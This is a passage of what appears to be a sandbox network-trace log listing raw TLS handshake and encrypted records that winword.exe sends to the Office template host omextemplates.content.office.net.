  252. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xee\\xab\\xd7\\x97\\xd8mbze\\x92(\\xff\n9x\\xe5\\xd2\\xe9q\\x17b\\xd6\\x19_g\\x04o`\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  253.  
  254.  
  255. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\x99f\\xa0\\x90-\\x18\\xbc\\xed\\xe6\\xa1g\\xe9\\xb7\\xbf\\xcb\\xf4%g\\xfaz\\xc9\\xf1\\xb3\\x97\nj9\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  256.  
  257.  
  258. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5<\\xfbz\\xdb\\xe7\\x99\\x8f\\x1e\\xcb\\x1f\\x99c\\xd5\\xbdr\\xba\\xd9c\\xd5n\\xb4\\xc8\\xcb \\xe2\\\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  259.  
  260.  
  261. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5n\\xe2\\x98\\x1d\\xefh\\xa1n\\x99a\\xe9\\xbc\\x16\\xade+\\x9f\\xf3#-tw\\xf8r8\\xaa\\xb4\\x99\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  262.  
  263.  
  264. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\x9b\\x03~d \\x9e\\x08\\x07\\x1b\\xb9i\\x11\\xed=9\\x8d\\xa3\\x92#d\\x82c\\xe5\\xd5\\xe1\\x1a\\xed\\x1b\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  265.  
  266.  
  267. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xe8 \\xe2\\x8bn^\\x08\\x9c\\xf9\\xcc\\xd5\\xd7\\xc8a\\xcd4\\xa1l\\xf4\\x93\\x9e\\x0bu\\x97c\\x8d\\xd2\\x14\\x11\\xfa\\x08\\xd93to,/\\x02dwp\\xe4\\xe3\\xca\\xcf@?\\x19\\x7f\\x02\\xa3|\\xa0\\xb8\\x08\\xef\\xdf\\xb3\\xd1&\\xa0x$\\x99\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xd6\\xce\\xfc\\xbb%\\x95\\xe7\\xed'\\x02\\xc4\\xbcsy\\xddro\\xf1\\xd6\\xd9bl\\x82\\x0c\\xa2\\x91!,\\xc6\\x93#\\x16\\xbeb\\xf1\\xd7i\\x98\\xa8\\xbdd\\xbc=9\\x96gfv"
  268.  
  269.  
  270. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xdab\\xf3g\\xd8\\xb4\\x92\\xff\\xc7\\x90\\xff\\x84\\\\xcf\\xac\\x17\\x17\\xb9\nsw\\xed>92\\x82\\xfar\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  271.  
  272.  
  273. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5zu\\xae\\x07\\x9f\\xb5#\\xad\\xf2\\xd1&\\xb0\\x95\\x82\\x10\\xd1(\\xd4=\\x15\\x14`\\x96\\xcf\t\\x8da\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  274.  
  275.  
  276. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5bt\\xb8nk4gv\\xe7giw\\xc7<\\x83b;1%\\xf1~\\xb8f\\x1a\\x08\\xcf\"\\xe9\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  277.  
  278.  
  279. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x045$\r\\xbal\\xa8\\x8a\\xb2\\xd2\\xce4j\\x11\\xab\\xf3\\xb1\\xfbg\\xb6\\x01\\x86\\xe8\\xa19\\xa8\\xcah7o\\xb9\\x1b\\xa7\\x8e\t\\xa2\\xca\\xdc\\xec\\xfc\\xb7\\xf1x\\xfb\\xdc?h\\x8a\\xc4\\xff\\xe2\\x04\\x18\\xc8\\xc9\\x1b\\x80rx!v-f\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000s\\xb1i\\x9al\\xa0\\xf3\\x7f\\xa3!g0\\xeb\\x96\\x9ej\\x17>ntom\\xeb\\x0c0\\9\\x82\\x83\\xab\\x9a@^$u\\xde\\xc2m\\xacc\\\t\\x15\\xe7t\\xd6m"
  280.  
  281.  
  282. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x0f5\n\\xf2\\x94=\\xfe\\x81ztu\\x07e\\x98/\\x85cp\\xd85\\xc1\\x8b\\xd2a^?\\x91\\xc6@\\xc0|\\x04\\xdd~\\x94\\xbdp\\xe4vu\\xee\\xac\\x13\\xb6^\\x9cn\\x83z\\xcc\\xa0\\xf7\\xd1s\\xe4\\xa4lk\\x88\\x8d\\xf7\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x0004g\\x93\\x0bb\\xd9\\x8d6\\x84\\x0f\\xc41,ngr\\xd5.\\xa2\\xbf\\xa25\\xb4;\tn\\xb5\\xfc\\xc1\\x04n\\xc2\\xff\\x8b\\x7f\\xb7\\xceb\\x91t\\x1e\\xbb\\x087\\xed\\xcb"
  283.  
  284.  
  285. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x92\\x7f\\x9d\\xfax\\x1b\\xc9-0\\x16l/c \\xc6\\xbav\\xd0\\xc0\\x15\\xe9%\\x029%\\xb63\\xeb\\xd7\r\\xe1\\x92\\x97\\x84d\\xbb1\\x1f0\\xd1\\xa9\\xde<m*iv\\xcc\\x8e\\xf1\\xf7\\x0f\\xead\\xa5\\xc0\\x87\\xdaf\t\\xfe\\xd9xy\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xc5\\x1aal\\xd4\\xc9\\xe4\\x98u?\\x02~\\xc4\\xe9\\x03\\xf7\\xc6\\xbf\\xef\\x06gh\\xbf\\x9a\\xbe\\x01\\x81d\\x93\\xfc\\xaa\\xfad0\\xc3\\x19\\xb2s\\x10\\xdbk\\x0fjed\\xef"
  286.  
  287.  
  288. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xde\\xb3\\xed\\xd2h\\x194\\xe33\\x99\\x08jc\\xbf\\xbf\\x822\\xba\\xa1\\x14\\xa7+\\x87\\x1d\\x0fk\\xc2\\xee\\xcf\\xfe\\x9d\\xfb<@tc\\xa3.w\\x1a\\x9d\\xd32\\xfb-z\\xa1\\xec\\x83\\xc3\\xb9\\xc5=\\x83fa!\\x92\\x93\\x07\\xf6\\x90\\x83\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000o.\\xc8\\xe36\\x8di\\xa4;\\xe3\\xd0fl<\\x87!\\xfc\\xfe\\x83\\xbe\\x7f\\x8f9\\xe5\\x05i*e\\x06v\\x91\\x9fe \\xeb\\x9du\\xf0\\x84\\x89\\x8e\\xf6s9yu\\xbd."
  289.  
  290.  
  291. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xb1\\x14m\\x91y\\x04\\xb8\\xac\\x9d\\xee\\xd2_\\xaa\\xc4\\x1f\\x07\\x12\\xf5(ik@-\\x03\\xc1\\x14%\\x98\\xb7evnb6<\\xddap\\x1f\\xc0>b\\xeb\\x9a\\xbf\\x18vgb\\x97\\xd1\\xb77`\\x99\\xce_\\xef\\xcbq\\xc9\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000#\\xa3sk*\\x80(s\\x8d\\x19p\\xac3`bcn0\\x12\\x86\\x06\\xcf\\xd3\\xd1-e\\xd1k\\x9b\\xae\\xe4\\xe8&c\\\\x99x\\xed\\xb8\\x0e\\x07\\xbap@\\xae\\xda\\xab\\xf6"
  292.  
  293.  
  294. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04i'\\xaf\\x1c\\x85\\xb5\\xe61\\x8b7>\\xa9ov\\xd1b\\x16\\xcb\\xfdc\\xf6\\xe5\\x98\\xcb\\xdd3~\\x7f\\xbb\\xe0\\xfc8\\xe65\\x81y\\xd1cfz\\x046\\x8c\\xba\\x1f\\xfc+\\x9d\\xb29\\xc0\\xfa\\xb4s\\xf9\\xd5`\\xb3z\\xbad%\\xb9\\x16\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xea\\xd8\n\\xf9\\xc1\\x12\\xcaoz\\xf7\"\\xf4s\r\\\\x88hk\\x15t\\x0bm?f\\x899+\\xc7\\x08\\xd7$\\x8e5\\xe0\\x11\\xbb\\xfbsg\\xe3h\\xd1w\\xb5\\xc3\\xc7\\xf3\\x8d"
  295.  
  296.  
  297. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x95\\x1c\\x8d=%\\xf4\\x91\\xc1g\\x17\\xfc\\xd4\\xae\\xf1\\x9b\\xac\\xcc\rv\\xdd\\xce\\xf1xszs\\x0e\\xca\\x14s\\x7f\\xdb\\xc40w\\xf5\\xa2yn\\xbe)\\x95\\xfe\\xfbi\\xc9\\xd3\t\\xd9\\x8d\\x1ex\\xf6\\xa5\\x1dj\\x08\\xdfv~\\x1f&l\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x06\\x9f\\xe3\\x81y\\x0b\\xa1\\xac\\xf7\\xfb\\xd4\\xc5 \\x88/l\\xb7\\xe5%\\x87\\xaf\\x955\\xb2y\\x08\\x10\\xd1\\x85\\x0e\\xfe\\x0e\\x17k,\\x8b\\xe0\\x1a\\xe7\\xa5k1\\xdc\\xb2&-d9"
  298.  
  299.  
  300. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x8f\\x99\\x87gt~-\\x8ew\\xfe\\x93\t\\xf4\\x8b-\\xc7\\xe2\\x98u\\xb0\\x19\\xba\\x12\\xb2c\\x83\\xa74\\xbbu\\xa4\\x1e\\x13\\xe7u\\xe1\\x9bflu%\\xa2i4\\xed\\xae\\xfd\\xfa\\xe1\\xb3\\xc2\\x17\\xff\\xa3,d\\xc5w\\x95\\xcb\\xa9e\\xec\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xe7,6\\xc8`\\xa9\\xda\\x008\\x12\\xabp\\x0e\\xac\\xfc\\xef\\x92\\x03j\\xd8\\x18\\x89\\xaf\\xbe\\x93\\x87\\xcf\\x8b\\xd6ab\\x92\\xa0\\x9br\\xba\\xe8\\x9e \\x88\\xec\\x88\\x12\\xb3\\x17k@"
  301.  
  302.  
  303. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04l=eav>\\x01\\x17\\xee:\\xe3\\xd8\\x1e\\x88\\xc4\\xf7h\\x8e\\xb9\\x1f~m\\xd9\\xb87\\xa8h\\x10f^g\\xe5\\xbc6ixc\\xff\\xe4yu\\xfb\\xbc\\xbf8\\x066\\xca\\x815\\x85\\xda\\x04\\x95\\x9f\\x00\\xbb\\x8a_\\x19\\xef\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xc7\\x97\\xb10\\xc3\\xfb%\\xba\\xfe\\xdfs\\x06\\x03\\x95\\x9b\\xbf\\x02>\\x0f\\x9b\\x1c\\xbc\\x9f!\\xf91\\xb6:2\\xe8br0\\xaf\\x94z_,\\xcb\\xbf^\\x8d\\xd7\\x1d\\xb6\\xf5\\x0f8"
  304.  
  305.  
  306. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xda\\x1b\\x1ft\\xff\\xae\\x0eb\\x07de!\\xb5mx\\xc3\\x9e4#`\\xf2\\xc6\\xd2.s\\xeb\\x95\\xa8\\xb2\\xde>o\\x9c\\x9d\\xb9\\xee\\xe4\\xd0\\xde\\xae\\xe9\\xad\\xc7`\\x99q\\xfb\\xd4\"\\xb1-\\x8f\t\\x8b\\xc0\\xa3\\xa2\\xb2\\xb3\\x02\\xd33p\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xb1u\\xd5\\xd7z\\xea,\\x1c\\xb2_l\\x0c\\x1bl1\\xb4\\x90\\x9d\\xa7\"\\xd5p\t19\\xa7\\xeee-21ci>k\\xeb\\xc4-\\xf54\\xdc%g\\xdc\\x0c\\xa7\\xc5 "
  307.  
  308.  
  309. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04+\\xe9\\xdc\\x88i\\xad\\xcb$&f\\xda9\\xae\\x1c\\x7f\\x8c\\xf5\\xce\\x15\\x95\\xcd\\xd9\\x01\\xe3\\xac\\xc0\\xcfn\\xdf\\xd5\\xcez\\xe5\\xb1\\x1f\\xe0=\\x1ce\\x0c\\xf15\\x93\\x06\\xd6\\xca\\x13\\x18\\xbe\\x8dw48\\x17wt\\xff\\x16t\\xac\\x01\\x11s\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000m\\x945\\x8e\\xd1p\\xc0`\\xb4\\x86u\\xf0s\\xd1\\xb3\\xfeo\\xe2\\xff7\\xe8?_*\\xb3\\x0b\\xae\\x882\\x0c\\xdcf\\xa09\\x97\\xf4xf\\xf6\n\\x86\\xc97\\xec\\x10\\xe9\\x9a"
  310.  
  311.  
  312. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xa4\\xc6\\x8e\\xe5r^\\x19\\xabl\\xea\\x14k\\xf5ohx`\\xffj\\x15\\xef\\xef\\xbbk \\xd4\\x9d\\x17\\xb5~\\xd1\\x80\\xf9\\x12r\\xa2\\xbat\\x1f\\x11\\xeep\\xba\\xea~&x\\x81\\x10\\x8ep\\x8c\\x9e\\xd7\\\\xba&\\x9fv9\t\\xbe\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xcb/r\\xfd\\xf2\\x81\\xa7\\x13f\\xd3\\xfc\\xf7\\xf2c\\xd7\\x99\\xca\\x07b\\xb6\\xc9\\xa9\\xea3\\xde\\xaf\\x1f\\x0e\\x96\\x9c7\\xd5- \\xa7\\xcf\\xc3\\xb9\\\\xb5\\xf4\\x00^\\x8c/\\xaf\\xcf"
  313.  
  314.  
  315. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xe1\\x04x\\xbb\\xa9\\xea>\\x88\\xb9\\x87\\x0b\\xca\\xb866\\x8e\\x88`\\x11=|\\xa5\\xe4\\x11\\xd5\\xe6\\x94\\xf0\\x02h\\xf8\\x00\\xb8x\\xd2\\xc8p\\xdf\\xc4'\\xab\\x8c\\xd0#x\\x96\\x1d\\xae\\xfe\\xcd\\xc9y\\xea\\xa03o \\xb8\\xa7\\xa0\\xc1\\xe6h\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xf0v\\x16\\xa5\\xb2ux'\\xbc\\xb4c\\xc2c\\xca\\xbc\\xf7\\xcd\\x822\\xd0,\\x8ds\\x12@\\xad\\xff\\xf1\\xb1\\xe0\\xfc\\x12v\\xb9.\\xc2\\xa4md\\xcc\\x15f\\x13\\x9d\\x02\\xe2\\xdc\\x89"
  316.  
  317.  
  318. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xeb\\x8d_c\\x1e\\x87\\xadk:\\x8f\\x95\\x92\\xc7\\xe2\\xdc\\x83\\xff@q\\xb5\\xe9\\x92bz\\xcduz\\xbc\r\\x9d\\x8e\\xb0c\\xd2\\xb3\\xcf\\x7f1\\x18|\\xc8\\x16\\x05\\x15u\\xdf\\xfa\\x15l\\x07vx\\x15\\x16q\\xed!\\xdd\\xdf\\xb3ku\\x8c\\x12\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\t0&4d\\x99\\x01\\xcc\\xe4\\xbc\\xea\\xdb\\xaf\\xf3\\xe58\\x97w\\x89\\xc2\\xdd\\xce\\xb7f\\x8f\\xbec\\xe3\\xf5kun\\x1a\\xd2\\xb0f\\xca\\xfbe\\xb4\\xb5q\\x18u\\xa0\\x1d\\x14"
  319.  
  320.  
  321. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x959\\xc3\\xf73;\\x14>\\xab\\xafrm\\xca\\xa2\\xc5\\x9e\\xf8\\x14\\xd8\\xfe\\x89nh\\xe5:fpg\\x9c\\x11\\xcf\\x84\\xee\\x08\\x1e:\\xb6\\xc0\\x87\\xd8\\xdf\\x80\\xbd\\x80ez\\xb6au\\xba\\x80\\x1b\\xfe\\xd1\\xb9\\x88d\\x9b\\xdd\\xd3\\xc8\\x1d\\xe4\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x0008\\x0fh\\xeb\\x88\\xd8\\x17fknp\\x862\\x14%\\xe6k\\xeah\\xf4\\x07\\xb6.i\\x8cov\\xc4\\xaf\\x95z\\xc6\\x9cf\\xbb\\xf3\\x81\\x18.\\xea\\x0c\\x15,\\x96\\x90\\x00"
  324. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xdd$\\x8c\\x84\\xb6\\x12\\xc1\\xff\\xba\\x9f\\xef\\xf3\\xber\\x93s5\\xa8\\xd6/\\xf5\\x8a\\xf9\\xe4c\\xd9\\x89\\xf7'\\xca\\x08z\\xa3\\2xi\\xa6\\xb6\\x18)%\\xd590\\xac\\xb5\\xa1\\xac\\xbf\\xbda\\xb4i\\x83(\\xaf\\x95\\xd0\\xfc\\x16!\\x0c.\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xa5\\xfc;,\\xfc0\\xbb+i\\xad\\x8a\\xf5\\xa7fa\\x16\\xa5\\x0b\\xc1\\xe0\\xf89\\xda\\xe8\\xb1\\xc4e\\xa19\\xa5\\x99\nv\\x80\\xcc\\x02,\\x89_ii\\xfe\\xb0g#\\x89i\\x11"
  327. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04gh\\xd2\\x8c\\xd2\\x07\\x8c\\x84\\xa7\\xc8\\xf9\\xc1\\x87s\\x94\\xa1\\x97r\\xb2\\xb4g\\xf2\\xa4\\xd2f\\xee\\xff\\xefm\\xd2pv\\xc4x\\xe8\\xca\\xd0\\xa2\\xab\\xa5<\\xc9vf\\xee~\\xc1\\xd0\n\\xe6\\x19\\x9c\\xc4\\x85\\xd09x%\\x95\\xd5\\x93\\xc6\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\r\\x15\\x02d\\x97\\x81h\\xaa\\xd5<a9\\x85\\xcc\\xb7\\xbad\\x04\\xf0>\\xbb\\xce\\xf3vtde\\xec\\xcb;b\\xd0\\xccf\\xbb~&\\xd8\\x94\\x15\\xa1~e\\xdb\r"
  330. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xc9\n\\xb4<'\\xb3\\xd3m\\xe6l\\x15\\xcc\tws\\x84\\xae\\xe1\\xf9\\x8c\\xe3\\x918\\xe3)u\\xc5:\\xc3\\x9eu\\xaf\\xd9a\\x00|a_\\x07\\xa07i\\xbf\\x83!\\xdb\\xb1eoc|\\xf4\\xae\\xc0e\\x96\\xfd\\xa2\\xec1\\xfc\\xc9g\\xa0\\xd3c\\xef\\xe3c\\\\xfa\\xcb|e\\x9b\\xc0o0r\\xe9\\xcf\\x9c\\xa0\\xa5\\x13`\\xc9\\xf9\\x81\\x01f\\x0bq-\\x99\\xc1t\\xdb\\xc6\\xafk\\xfb@)\\xcf\\xf8\\xa7/\\xdf\\x158\\xe4\\x1f\\x9f\\xb1\\xf7\\x92\\x95,\\xbb\\x89\\x183\\xa4mkt\\xa8s\\x90d7b\n\\xa1\\xb5\\xa4\\xc2>\\x9b\\xb2\\x93\\x96\\xae\\x11r\\xe0y/\\xbb\\x84\\xea@\\x8ch\\xbb\\xc7\\xf7<n\\xd7r\\x9213\\x02\\x83*\\xdb\\xfa\\xc5\\x87y\\xfbo\\xf8\\xea9\\x1a\\xef\\x8ai\\xbef\\x14\\x98\\xf1\\x11\\xc6\\xf3q\\x93'\\xc6\\x8e\\xaf\\xc3\\xc0\\x1fs\\xe7\\xfa\\x855\\xa4k\\x16j\\x8c\\x8e\\xbc^\\xd9\\xddo\\xa3o\\xa9\\xbbzp!p\\xa8z\\x04\\xe6\\xcbz\\x01r\\xdc\\xc6\\x1e\\xed\\x08\\xd9\\xfd\\x0f\\xf0\\xe1\\xc10?\\xc8//>"
  333. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x15\r\\x1f\\xa0\\xcd\\x10)\\xe5\\x8c\\xd9j\\x1a\\x97\\x80e\\xb8\\xd3y.\\xe4\\x8a\\x17\\\\x1e\\x80:/\\xc7\\xb6\\x82\\xcda\\xf3.*u\\xceutf\\xdbg\\xd9\\x93\t\\xad\\xc4v\\xa0\\x0b\\xce\\xe5\\xee\\x80\\xc4u\\x19_*\\x1f\\x88\\xd5h\\xd7t\\xbb61\\xe1dl~\t,<\\xba\\xc4q 3\\xe7\\x0c\\x9f\\xf90\\xc2#'\\x18\\x8d\\xccn\\x90\\xa9\\xac\\xb41\\x95\\xfd\\xf3\\xd7\\x0c\\x9d\\x87\\xe9`\\x91v!\\x86\\x90\\xd3\\x19&u\\xc0s\\xc2\\x97\\xa4c\\xcfl\\x93\\xb3\\xcb\\x89\\xdc\\xe7\n\\x15\\xbc\\x0fp\\xbb\\xeb\\xdc\\xcd\\xb1s\\x86\\xf5\\xa1\\xf78\\x85\\xf3m\\x19\\x87\\xaa\\xc7\\xdcn\\x15\\xd1\\xf7\\x81\\xf2(\\x82\\xb8\\xbbs\\x8f\\xe9noba\\x82\\xca\\xeb\\xc5%\\x03\\xbc_\\xf2i)\\xe3\\x01\\x1a\\xb7a\\xbdp\\xef\\x99\\x89`*\\x03\\xe1\\x861\\x14\\xb8j\\xc6\\x17\\xd1?m>\\xc0\\xd0v\\xf1\\xcc\\xb3\\xf27\\xf3\\xd0u\\x06\\xfcr ej!\\xf2y\\x14v\\x18\\xf3\\xee\\xa2>%m\\xb7d\\xdd\\x15\\\\x19\\xd7\\xc9\\xc3_"
  336. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\\\xe6zg\\xfez\\xdb\\xc3\\x05>c\\xfe\\x0e\\xd9g\\xe2*\\xdf8\\xcb\\xc5*l3\\xe1\\x1f\\x8e\\xfd\\xd4g\\x96\\xa4q*\\x84\\x92\\x82\\x1c4\\xc5\\xe4\\xf5\\x8d(\\xd6\\xcer\\x9d\\xdc1i\\xc9\\x9dhjx\\xa8\\xad;w\\xf0u\\xad\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x12\\xa0p\\xb3u\\xd4\\x98\nvp|\\x99a=^\\xce\\x84\\x98\\xd1\\xa5\\xb4\\xf8v,%\\x1b\\xa3g\\xb0\\xc7\\x1de\\xf9\\xd8\\xd3q\\x87\\xa2\n\\xe4\\x8d\tjg\\xb7!d"
  339. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5b\\x12@\\x91g\\x04\\x0b\\xb4p\\xe6b\\x1c:\\xca\\xcf(\\xcc\\xc4dl\\xbd>\\x10\\xf6\\xa7?x\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  342. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xc8\\x15\\x03\\xa2\\xdb\\xd1\\x02\\xaaq\\xa4^\\xe8v\\x89b\\xces\\xed\\x05\\\\xb4z\\xf5y\\xdb\\x0f#d+kg\\xcb\\x01i\\xe0\\xd2\\xaf\t\\xc2b\\x98\\xe9\\x18\\xb4h\\xc03z\\x94\\xd0\\xd0fx<\\xda\\x05\\x0e\\xdc\\x03c\\xb8j:\\x80=\\x08\\x11s\\xd6\\xca\\xe3\\xc5\\x82\\x02\\x83\\xb4g\\x10\\xbc\\xe6\\xa5~\\x98\\xfer\\xf5|\\xff5\\xca\\x0b2\\xcf\\xf0\\xa3\\xe5k\\xe7\\xf6\\x04\\xd5\\xe4\\x01\\xcd\\x8d0\\x1f@\\xd6rs\\x92\\x1a\\xfcc\\xe4z\\xa3\\xf9o\\xf3/\\x96p$\\x00\\x1es\\xc7\\xd4\\x1at\\xeb\\xe9\\xe8\\xe1\\xcfq\\x1e\\xbdi\\x0e\\xa1\\x91\\x8c\\x90x2\\xcf\\xdcs\\xf9\\x15\\xa5l?i\\xf1\\xdd'f\\x87^\\xfb\\xeb\\xdem\\xd68\\xaar\\xa7f\\x01\\x9d$\\xa8\\x92\\xf9\\xdd\\xaedh\\x9d/\\x8b\\xbd3\\xca\\x07^\\x8b<cl\\xe4\\xcc)\\x1du\\xca>\\xbd6\\x96d\\xd1d\r\\xd6y&\\x7fl\\xab\\xda\t\\x9c\\x9c\\x191\\xb8\\xc9\\xa8_<\\xfd\\xfe\\xae#\\xfb\\xd3,6h\\xe1\r\\xea\\xbcj\\x03\\xf5\\xb0\\xb5\\x83>+f\\xb0"
